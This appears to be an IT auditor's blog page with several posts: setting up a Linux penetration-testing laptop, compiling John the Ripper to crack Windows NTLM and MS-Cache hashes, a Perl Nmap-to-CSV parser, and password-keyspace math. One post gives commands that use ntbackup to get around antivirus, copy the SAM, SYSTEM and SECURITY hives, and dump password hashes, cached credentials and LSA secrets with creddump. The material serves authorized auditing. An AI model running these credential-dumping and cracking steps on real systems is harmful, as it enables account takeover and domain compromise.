admin

 

I’m now providing an updated Linux Penetration Testing Laptop Setup document to help install popular and useful vulnerability assessment tools for the Linux operating system. You can go and obtain Backtrack but I feel that you will have more understanding of the tools and Linux in general if you install the tools yourself. You will also have the most current version available. See Configuration Tutorials for the latest document.

Update: The latest version is now v4 on Ubuntu 11.4 Natty Narwhal.

 

I put together a Technical Assessment Plan that can be used to conduct external fingerprinting using the tools and utilities that a penetration tester would use.  The assessment plans are structured in a way to help with the documentation of evidence for inclusion in a work-paper process.  The plan provides helpful information on how to install, configure, and use the tools to obtain the evidence needed for an engagement.  The Technical Assessment Plans that I have created can be found here.

 

Earning CPE credits in a down economy for your Information Security certifications.

As we enter 2011 the financial talking heads say that our economy is recovering.  However, your company’s training budget does not reflect this recovery.  Trips to security conferences in Las Vegas, Miami, and Orlando are all out of the question.  With all of the information security certifications that you have obtained to keep competitive in this tough economy you are required to earn Continuing Professional Education (CPE) credits.  Below I will list some simple steps you can take to still keep current on the latest security trends while earning those valuable CPE credits to maintain your certification.


 

A question was raised today during a presentation about what utilities you can use without installing them. There are engagements that the auditor is not allowed to use their own laptop and must use a laptop provided by the auditee. This severely limits how effective an engagement can be but it is not impossible to obtain the information you need when you connect to the auditee’s network. I’ve made changes to the Security Tools page to highlight which tools are stand-alone and do not require installation.  Also for reference see Penetration Testing Ninjitsu which I pulled from a Core Security webcast.

 

NA CACS conference hosted by ISACA (18-22 April 2010)

Remote Security Testing for Web Applications
Presented by David Rhoades
Maven Security Consulting

Attending this conference workshop session introduced me to Maven Security’s Web Security Dojo.  This is an Ubuntu-based virtual image that includes several free and open source tools used for web application auditing.  The image also includes web application environments that are vulnerable to many common vulnerabilities, so you can test and learn how to use the tools.  This pre-configured environment is perfect for educational purposes.  They also include a BASH script that will set up your own Ubuntu environment.

 

I’ve created an updated configuration tutorial for setting up your Linux laptop to conduct system and network audits.  This version details how to get everything up and running on the latest Ubuntu currently at version 10.04 LTS (Lucid Lynx).  See the Configuration Tutorials to download the latest pdf document (currently at version 3).

 

9.19.2011 – Updated for latest openssl and john jumbo patch on Ubuntu Natty Narwhal 11.4

Password cracking Windows hashes on Linux using John the Ripper (JtR). If you prefer the Linux operating system, JtR is the password cracking utility to use. By default JtR does not support the Windows hashes we are interested in cracking (NTLM and MS-Cache). See below for installation and patching instructions for JtR; applying the jumbo patch adds the functionality to crack NTLM and MS-Cache passwords.  NOTE: This install was done on Ubuntu 10.4 LTS but should work on any Linux system since we are compiling from source.

$./john --format=mscash --rules --wordlist=<PASSWORD_LIST> <CACHE_HASH_FILE>
$./john --format=nt --rules --wordlist=<PASSWORD_LIST> <NTLM_HASH_FILE>

For additional information you can read the JtR documentation and wiki from Openwall.

OpenSSL is needed. It can be installed through your package manager or may already be installed.  Remember to install the development package (libssl-dev or libssl-devel).  Instructions to download and compile OpenSSL from source are included below.

JtR 1.7.8

$ wget http://www.openssl.org/source/openssl-1.0.0e.tar.gz
$ tar zxvf openssl-1.0.0e.tar.gz
$ cd openssl-1.0.0e
$ ./config --openssldir=/usr/local
$ make
$ sudo make install
$ wget http://www.openwall.com/john/g/john-1.7.8-jumbo-5.tar.gz
$ tar zxvf john-1.7.8-jumbo-5.tar.gz
$ cd john-1.7.8-jumbo-5/
$ cd src/
$ make linux-x86-64
$ sudo make install


JtR 1.7.7

$ wget http://www.openssl.org/source/openssl-1.0.0d.tar.gz
$ tar zxvf openssl-1.0.0d.tar.gz
$ cd openssl-1.0.0d
$ ./config --openssldir=/usr/local
$ make
$ sudo make install
$ cd ..
$ wget http://download.openwall.net/pub/projects/john/1.7.7/john-1.7.7.tar.gz
$ tar zxvf john-1.7.7.tar.gz
$ cd john-1.7.7/
$ wget http://download.openwall.net/pub/projects/john/1.7.7/john-1.7.7-jumbo-6.diff.gz
$ gzip -d john-1.7.7-jumbo-6.diff.gz
$ patch -p1 < john-1.7.7-jumbo-6.diff
$ cd src/
$ make linux-x86-sse2

John will be found in the run directory.

The pre-patched 1.7.7 jumbo-6 source is also available as a single tarball: http://www.openwall.com/john/g/john-1.7.7-jumbo-6.tar.gz
 

As an auditor I liked to quickly analyze my Nmap scan results by parsing the XML output produced and loading it into my favorite spreadsheet application.
From there I could sort by host, port, service, or operating system for analysis. The parsed results are a lot easier to add to reports and workpapers. Just remember to keep the original Nmap results.
I’ve developed a LAMP framework to parse and load Nmap results into a database for reporting and analysis. However if you are just looking to quickly parse the results of individual scans I’ve got a Perl script for you!
First, a quick blurb on installing Perl and the Nmap::Parser module.

Windows

Download ActivePerl from the Active State website: https://www.activestate.com/activeperl/downloads/
Once ActivePerl is installed you will need to install the Nmap Parser written by Anthony Persaud.
From the Command Prompt enter the following command:

C:\>ppm install nmap-parser
Downloading Nmap-Parser-1.19...done
Downloading XML-Twig-3.32...done
Unpacking Nmap-Parser-1.19...done
Unpacking XML-Twig-3.32...done
Generating HTML for Nmap-Parser-1.19...done
Generating HTML for XML-Twig-3.32...done
Updating files in site area...done
21 files installed

Linux

For Ubuntu/Debian you can install the package.
#apt-get install libnmap-parser-perl

On any Linux distro you can install the module via CPAN.
#perl -MCPAN -e 'install Nmap::Parser'

Copy the Perl code below and save it as nmap_parse.pl.


#!/usr/bin/perl
use strict;
use warnings;
use Nmap::Parser;

my $np = Nmap::Parser->new;
my $infile = $ARGV[0] or die "usage: $0 <nmap_output.xml>\n";

$np->parsefile($infile);

# Format one CSV field: empty string for undefined values (hosts with no
# hostname, ports with no product/version), double quotes around fields
# that contain commas, quotes or newlines
sub csv {
    my $v = shift;
    $v = '' unless defined $v;
    if ($v =~ /[",\r\n]/) {
        $v =~ s/"/""/g;
        return qq("$v");
    }
    return $v;
}

#GETTING SCAN INFORMATION

print "Scan Information:\n";
my $si = $np->get_session();
print
'Number of services scanned: '.csv($si->numservices())."\n",
'Start Time: '.csv($si->start_str())."\n",
'Finish Time: '.csv($si->time_str())."\n",
'Scan Arguments: '.csv($si->scan_args())."\n";

print "Host Name,Ip Address,MAC Address,OS Name,OS Family,OS Generation,OS Accuracy,Port,Service Name,Service Product,Service Version,Service Confidence\n";
for my $host ($np->all_hosts()){
    my $os = $host->os_sig;   # OS fingerprint belongs to the host, not the port
    for my $port ($host->tcp_ports()){
        my $service = $host->tcp_service($port);
        # one CSV row per host/port pair
        print join(',', map { csv($_) }
            $host->hostname(), $host->ipv4_addr(), $host->mac_addr(),
            $os->name, $os->osfamily, $os->osgen(), $os->name_accuracy(),
            $port, $service->name, $service->product, $service->version,
            $service->confidence()), "\n";
    }
}

Save the above code and run it from the command line as follows:

C:\>nmap_parse.pl nmap_scan_output.xml >> results.csv

Additional Information

ppm – Perl Package Manager, version 4

http://docs.activestate.com/activeperl/5.10/bin/ppm.html

ActiveState CPAN PPM Repository

http://ppm4.activestate.com/

Nmap Parser

http://search.cpan.org/dist/Nmap-Parser/Parser.pm

 

Take this hypothetical scenario (Okay, it really wasn’t hypothetical at the time).  You recommend to your client that minimum 8 character passwords should be enforced but they want a minimum of 6 character passwords and instead they will enforce password complexity (alphanumeric and special characters).

As auditors we like to have facts to back up our recommendations.  What better fact than simple math.

Password strength in relation to the number of guesses an attacker needs to brute force the password is represented by the number of characters available to choose from raised to the power of the length of the password.

N^x

N = number of characters available
x = length of the password.

Let’s do some simple math for six character passwords vs eight character passwords.  We will even require complex passwords for the six character password and simpler password requirements for the eight character password.

If an individual was required to have all 4 character strength requirements (uppercase and lowercase letters, numbers, and special characters) and had a six character password we can compute how many guesses you would need to crack the password.

Upper alpha = 26
Lower alpha = 26
Number = 10
Special Char = 32

Note: Special character support depends on the system.  In this example we are going with what Windows supports for passwords ()`~!@#$%^&*-+=|\{}[]:;"'<>,.?/ and space.  Also of note, Windows supports 65,000 additional Unicode characters, but we will keep it to symbols found on the keyboard.  Other systems do not support as many special characters as Windows.

94^6 = 689,869,781,056  (690 billion guesses).

Now we take a password with only upper and lowercase password requirements but make it an eight character minimum requirement.

Upper alpha = 26
Lower alpha = 26

52^8 = 53,459,728,531,456 (53.5 trillion guesses).

As you can see the eight character password, with few character requirements, has 74 times more choices than a “complex” six character password.
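As an added worked example (not code from the original post), the N^x formula above carried through in Python for the two policies being compared. It also goes beyond the post in one respect: a policy that requires at least one character from each of the four classes admits fewer than 94^6 passwords, and keyspace_requiring_all() counts exactly how many by inclusion-exclusion over the classes that could be missing. The class sizes (26, 26, 10, 32) are the post's; the guess rate used for the time estimate is a constructed placeholder, not a measured figure.

```python
from itertools import combinations, product

# Character-class sizes from the post (Windows keyboard specials counted as 32)
CLASS_SIZES = {"upper": 26, "lower": 26, "digit": 10, "special": 32}


def keyspace(charset_size, length):
    """N^x: candidate passwords when every position may hold any of N
    characters and the password is exactly `length` characters long."""
    return charset_size ** length


def keyspace_min_length(charset_size, min_length, max_length):
    """Sum of N^x for x from min_length to max_length: a 'minimum 8' policy
    also admits 9-, 10-, ... character passwords up to the system maximum."""
    return sum(charset_size ** x for x in range(min_length, max_length + 1))


def keyspace_requiring_all(class_sizes, length):
    """Strings of exactly `length` over the union of the classes that contain
    at least one character from EVERY class, counted by inclusion-exclusion
    over the set of classes left out. This is the real size of a 'must
    contain upper, lower, digit and special' policy, and is always below N^x."""
    sizes = list(class_sizes)
    total = sum(sizes)
    count = 0
    for k in range(len(sizes) + 1):
        for missing in combinations(range(len(sizes)), k):
            remaining = total - sum(sizes[i] for i in missing)
            count += (-1) ** k * remaining ** length
    return count


def brute_count_requiring_all(alphabets, length):
    """Exhaustive cross-check of keyspace_requiring_all for tiny alphabets."""
    pool = "".join(alphabets)
    return sum(
        1 for s in product(pool, repeat=length)
        if all(any(c in alphabet for c in s) for alphabet in alphabets)
    )


def guess_ratio(space_a, space_b):
    """How many times larger space_b is than space_a."""
    return space_b / space_a


def days_to_exhaust(space, guesses_per_second):
    """Worst-case time to try every candidate at a constant guess rate."""
    return space / guesses_per_second / 86400


if __name__ == "__main__":
    six_complex = keyspace(94, 6)
    six_all_classes = keyspace_requiring_all(CLASS_SIZES.values(), 6)
    eight_alpha = keyspace(52, 8)
    rate = 1_000_000_000  # constructed placeholder: one billion guesses/second
    print(f"94^6 (six chars, any of 94):          {six_complex:,}")
    print(f"six chars, all four classes required: {six_all_classes:,}")
    print(f"52^8 (eight chars, letters only):     {eight_alpha:,}")
    print(f"eight-alpha / six-complex (N^x):      {guess_ratio(six_complex, eight_alpha):.1f}x")
    print(f"eight-alpha / six-all-classes:        {guess_ratio(six_all_classes, eight_alpha):.1f}x")
    print(f"days to exhaust 52^8 at {rate:,}/s: {days_to_exhaust(eight_alpha, rate):.2f}")
```

The inclusion-exclusion count is the number an auditor should quote for a "must contain all classes" rule: 94^6 is the upper bound for six characters drawn from all 94 symbols, but forcing every class to appear removes every string that omits one, so the gap between the two policies is even wider than the plain N^x comparison suggests.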

How about some computational proof!  I use Cain & Abel to show how long it would take to brute force the example above with an NTLM (local Windows account) hash and an MS-Cache hash (domain Windows account).  Note: Brute force time also depends on the cost of the hash algorithm used.  You will see that the MS-Cache hash is more expensive to compute than NTLM.

NTLM six character, alphanumeric and special characters (here).
NTLM eight character, alpha characters (here).

MS-Cache six character, alphanumeric and special characters (here).
MS-Cache eight character, alpha characters (here).

The computational results from Cain & Abel show that it takes about 80 times longer to brute force the less complex eight character password than the more complex six character password.

 

An auditor’s interest in the Windows NTBACKUP Utility extends beyond examining their DR/BCP plan.

Suppose you just got command prompt access to a server (example tutorial 1, 2, & 3) but the host has anti-virus installed and you can’t disable it. You can’t use your trusty pwdump2 to dump the local password hashes (the same utility that SQLAT and SQLNINJA use). No problem, just use the ntbackup utility to make a current backup of the registry (including SAM and SYSTEM keys).

C:\>ntbackup backup systemstate /j "Auditor Owns Your Hashes" /f "%systemroot%\temp\%Username%SysState.bkf" /a
C:\>del "%systemroot%\temp\%Username%SysState.bkf"

You don’t need the backup file you created so it can be deleted (C:\>del %systemroot%\temp\%Username%SysState.bkf). When a backup is done of the systemstate the files in the %systemroot%\repair folder are updated. Copy the sam, system, and security files from %systemroot%\repair.

Once those files are obtained you can use the command line utilities from the creddump project to produce the same files obtained from PWDumpX (see tutorial).

Python needs to be installed for creddump to work.

Python version 2.5.4 from http://www.python.org/download/releases/2.5.4/
Pycrypto version 2.0.1 from http://jintoreedwine.com/files_and_stuff/pycrypto-2-0-1.zip

C:\creddump-0.1>pwdump.py SYSTEM SAM >> PWHashes.txt
C:\creddump-0.1>lsadump.py SYSTEM SECURITY >> LSASecrets.txt
C:\creddump-0.1>cachedump.py SYSTEM SECURITY >> PWCache.txt

Using RainbowCrack and the rainbow tables obtained from The Shmoo Group you will be able to obtain the passwords to any local account with a password of 14 characters or less from PWHashes.txt.

See this tutorial on how to dictionary attack the passwords obtained from the PWCache.txt file.

You can review the LSASecrets.txt file to obtain plain text passwords for Windows service accounts. Often these accounts are also Domain accounts with the same password or even Domain Administrator accounts.

© 2012 Information Systems Auditing